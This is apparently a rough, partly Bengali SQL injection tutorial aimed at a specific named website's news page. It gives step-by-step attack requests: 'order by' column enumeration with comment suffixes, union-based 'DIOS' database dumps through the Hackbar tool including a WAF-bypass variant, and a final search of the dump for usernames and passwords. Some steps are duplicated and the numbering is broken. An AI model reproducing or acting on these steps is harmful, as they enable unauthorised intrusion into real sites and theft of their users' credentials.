Professional Documents
Culture Documents
000 Find Total Column
000 Find Total Column
http://math4all.in/news.php?id=6
1. add
order by 1000
and see if the server hear it.
http://math4all.in/news.php?id=6 order by 1000
2. if not add
--+ or -- -
after 1000
http://math4all.in/news.php?id=6 order by 1000--+
result is = 10.1.41-MariaDB-0+deb10u2
if version is less than 4 then its not downloadable.
7.
now dump all data
select vulnarable column
like
3 or 4 and
go to hackbar
select union based
then DIOS MYSQL
then DIOS BY ZEN
Then again DIOS BY ZEN
now execute
#why zen? zen is lightweight, it works on maximum website.
if not then
go to hackbar
select union based
then DIOS MYSQL
then DIOS BY TRO@JAN WAF
then again trojan waf select korbo
link load hole execute dibo
go to hackbar
select union based
then DIOS MYSQL
then DIOS BY TRO@JAN WAF
then again trojan waf select korbo
link load hole execute dibo
if trojan used
now find pass and user data from the database
use control + f button